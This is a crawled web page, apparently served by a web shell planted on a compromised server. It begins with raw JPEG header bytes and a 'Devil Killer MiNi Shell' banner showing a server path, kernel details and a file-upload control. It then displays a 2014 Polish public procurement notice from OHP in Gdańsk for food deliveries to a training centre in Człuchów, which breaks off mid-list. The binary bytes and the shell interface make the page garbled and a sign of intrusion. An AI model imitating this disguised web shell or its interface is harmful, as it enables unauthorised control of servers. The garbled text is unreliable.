JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140930/323348-N-2014.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie w  2015 r.</b><br>
<b>Numer ogłoszenia: 323348 - 2014; data zamieszczenia: 30.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pomorska.ohp.pl/  http://www.pomorskie.eu/pl/bip/ohp</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie w  2015 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	UWAGA WAŻNE !!! Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
2.	UWAGA WAŻNE !!! Pełnomocnictwo do reprezentowania wykonawcy musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie).
3.	UWAGA WAŻNE !!! Niedopuszczalne jest zmienianie asortymentu w formularzach cenowych np. wpisywanie asortymentów o innej gramaturze, innej ilości,  itp. 
Dokonanie wszelkich zmian  w formularzach cenowych będzie skutkowało odrzuceniem oferty wykonawcy na podstawie art. 89 ust 1 pkt. 2 uPzP. 
4.	Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Człuchowie od 1 stycznia 2015 r.  do dnia 31 grudnia 2015 roku do: Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4. 
5.	Przedmiot zamówienia podzielono na siedemnaście zadań częściowych:
Zadanie	1. owoce świeże
Zadanie	2. owoce przetworzone
Zadanie	3. warzywa świeże
Zadanie	4. warzywa przetworzone 
Zadanie	5. mrożonki
Zadanie	6. jaja
Zadanie	7. mięso i produkty mięsne
Zadanie	8. drób
Zadanie	9. wędliny i produkty wędliniarskie
Zadanie	10. pasztety i konserwy
Zadanie	11. ryby i przetwory
Zadanie	12. pieczywo i ciasto
Zadanie	13. produkty skrobi 
Zadanie	14 produkty spożywcze różne
Zadanie	15 oleje i tłuszcze roślinne
Zadanie	16 produkty mleczarskie
Zadanie	17 napoje
Zadanie	18. owoce świeże
Zadanie	19. owoce przetworzone
Zadanie	20. warzywa świeże
Zadanie	21. warzywa przetworzone 
Zadanie	22. jaja
Zadanie	23. mięso i produkty mięsne
Zadanie	24. ryby i przetwory
Zadanie	25. produkty skrobi 
Zadanie	26 produkty spożywcze różne
Zadanie	27 oleje i tłuszcze roślinne
Zadanie	28 produkty mleczarskie
Zadanie	29. drób
6.	Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy).
7.	Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
8.	Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
9.	Cykliczne dostawy  będą realizowane jak następuje:  
10.	Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
11.	Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
12.	Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
13.	Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
14.	Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
15.	Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
16.	W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
17.	Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
18.	Do składania zamówień Zamawiający upoważni wybranego pracownika.
19.	Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
20.	W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
21.	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane pod pojęciem typu. 
22.	Wykonawca na żądanie zamawiającego ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego.  
23.	Zamawiający zastrzega sobie możliwość  zastosowania prawa opcji, tj. możliwość zmniejszenia ilości poszczególnych rodzajów artykułów żywnościowych w stosunku do podanych w formularzu cenowym. Maksymalny zakres przedmiotu zamówienia może zostać pomniejszony o nie więcej niż 90 % ogólnej wartości tzn. zostanie zrealizowany w co najmniej 10 % wartości zamówienia.
24.	Wartość brutto w formularzach cenowych należy wyliczać według wzoru:
ilość x cena brutto za 1 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.89.80.00-9, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-6, 03.14.25.00-3, 15.00.00.00-8, 15.13.11.10-9, 15.13.11.30-5, 15.11.90.00-5, 15.90.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 29.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
- Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia - art. 23 ust. 1 ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.
- Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich                   w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dlatego też zobowiązane są dołączyć do oferty - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia, albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
- Zaleca się dołączyć dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik także pełnomocnictwo określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
- Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
- W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. Stawki ZUS. W przypadku zmiany obowiązującej stawki podatku VAT, stawki ZUS Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT lub ZUS. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT, stawki ZUS jeszcze nie dokonano.
- Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
- Zmiany powszechnie obowiązujących  przepisów  prawa  w  zakresie  mającym wpływ na realizację umowy.  
- W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorska.ohp.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 610, VI piętro. ul. Uphagena 27, 80-237 Gdańsk,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2014 godzina 08:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat pokój 605) 6 piętro:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie	1. owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz	kg	80
banany	kg	180
brzoskwinie	kg	80
cytryny	kg	20
czereśnie	kg	5
gruszki	kg	30
jabłka	kg	400
kiwi	kg	10
kiwi	szt	35
nektaryny	kg	20
mandarynki	kg	50
pomarancza	kg	60
pomarańcza siatka	kg	50
truskawki	kg	20
wisnie	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie	2. owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany400-500g	szt	60
brzoskwinie kons.0.9	szt	30
Dżem  słoik 220/260 ml	szt	120
kompot  0,9l	szt	8
kompot wiśniowy 0,9 l	szt	8
sok owocowy 2l ( różne smaki - pomarańczowy, grejfrut, jabułko, cz. Pożeczka, mix itp..	szt	30
sok owocowy 1l( różne smaki- pomarań, gruszka, wiśnia, grejfrut, mix.itp.)	szt	20
sok  typu owocowo, warzywon- owocowe( marchew-trusk-banan,marchew-malina-banan, marchew-banan, itp..) 220ml	szt	360
syrop owocowy 0,5l	l	150
syrop owocowy 1l	l	10
rodzynki suszone 100g	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie	3. warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody	kg	25
burak	kg	300
brokuł	szt	5
cebula	kg	200
cebula młoda	kg	20
cebula czerwona	kg	5
czosnek	kg	5
fasola jaś 0,4-0,5kg	szt	50
fasola drobna 0,4-0,5 kg	szt	20
fasola szparagowa	kg	10
groch łuskany	kg	30
kapusta czerwona	kg	50
kapusta młoda	szt	100
kapusta	kg	300
kapusta pekińska	kg	150
kapusta pekińska	szt	50
kapusta włoska	kg	10
kalafior	szt	5
koper	szt	50
koper duży	szt	5
marchew młoda	kg	80
marchew myta	kg	200
ogórek gruntowy	kg	20
ogórek świeży	kg	80
papryka świeża	kg	20
pietruszka korzeń	kg	100
pomidor	kg	100
por	szt	30
por	kg	50
rzodkiewka pęczki	szt	30
sałata	szt	10
sałata dekoracyjna	szt	10
seler	kg	100
seler naciowa	szt	5
szczypiorek	szt	30
zielenina natka	szt	50
ziemniaki młode	kg	500
ziemniaki	kg	2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie	4. warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160-200g	szt	30
cebulka konserwowa 300g	szt	5
fasolka czerwona konserw.400-460	szt	10
groszek konserwowy 400g	szt	50
groszek z marchewką 0,9l	szt	8
kapusta kiszona 	kg	60
koncentrat pomidorowy 0,9l	szt	40
kukurydza konserwowa 0,4-0,45 l	szt	50
kukurydza kons. 0,9 l	szt	10
oliwki 200ml	szt	3
ogórki kiszone 	kg	60
ogórki małosolne	kg	10
ogórki konserwowe 0,9l	szt	50
papryka konserwowa 0,9l	szt	24
pieczarka	kg	20
pieczarka konserwowa 0,9l	szt	30
pieczarka solona 0.9	szt	8
szczaw konserwowy 0,9l	szt	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie	5. mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 	kg	20
fasolka szparagowa	kg	20
Frytki 	kg	5
groszek mrozony	kg	5
kalafior mroż	kg	30
marchew kostka mroż	kg	50
marchew z groszkiem mroż	kg	25
mieszanka kompotowa	kg	5
pizza 250-300g	szt	35
pyzy z mięsem  	kg	40
pyzy z owocami (knedle)	kg	10
szpinak	kg	3
truskawki mrozone	kg	2
warzywa na patelnię	kg	5
warzywa na pat.chinskie	kg	5
zapiekanka 200-250g	szt	35
zupa wiosenna	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie	6. jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	2400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie	7. mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek świeży	kg	15
golonka wieprz b/k	kg	10
golonka wiep z kością	kg	5
karkówka wieprz b/k	kg	20
karkówka wieprz z/k	kg	5
kości wieprzowe	kg	30
łopatka b/k	kg	130
łopatka z kością	kg	10
mięso gulaszowe	kg	30
polędwica wieprzowa (Mięso)	kg	2
schab wiep b/k	kg	20
schab wiep z/k	kg	5
słonina	kg	10
szynka wiep b/k	kg	20
wątroba wieprzowa	kg	30
wołowina zrazowa	kg	5
żeberka wiep	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.90.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie	8. drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ćwiartki tylne drobiowe	kg	10
filet drobiowy	kg	20
filet z piersi kurczaka	kg	120
korpusy drobiowe(grzbiety)	kg	400
serca drobiowe	kg	7
wątroba drobiowa	kg	35
udka	kg	400
żołądki drobiowe	kg	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie	9. wędliny i produkty wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	5
boczek wędzony gotowany	kg	3
boczek wędzony surowy	kg	3
boczek  rolada	kg	1
kabanosy typu leśne lub równoważne	kg	5
